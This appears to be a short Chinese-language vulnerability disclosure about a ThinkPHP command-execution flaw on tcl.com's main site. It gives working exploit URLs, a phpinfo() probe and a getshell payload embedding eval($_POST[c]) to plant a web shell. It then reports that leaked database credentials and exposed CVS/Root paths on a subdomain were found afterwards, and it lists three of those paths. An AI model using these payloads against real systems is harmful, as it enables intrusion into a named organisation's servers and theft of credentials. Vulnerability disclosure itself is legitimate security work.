1. 主站命令执行
是thinkphp的命令执行漏洞,这么久了还没修复,维护人员该打pp了
http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()}
直接http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D getshell
来张图

内网信息
内网敏感信息泄漏
翻下目录,发现了内网好多信息
1. n多数据库账户密码泄漏
2. 附赠子域名站点cvs信息泄漏一枚
http://multimedia.tcl.com/cn/investor/CVS/Root
http://multimedia.tcl.com/CVS/Root
http://multimedia.tcl.com/en/home/CVS/Root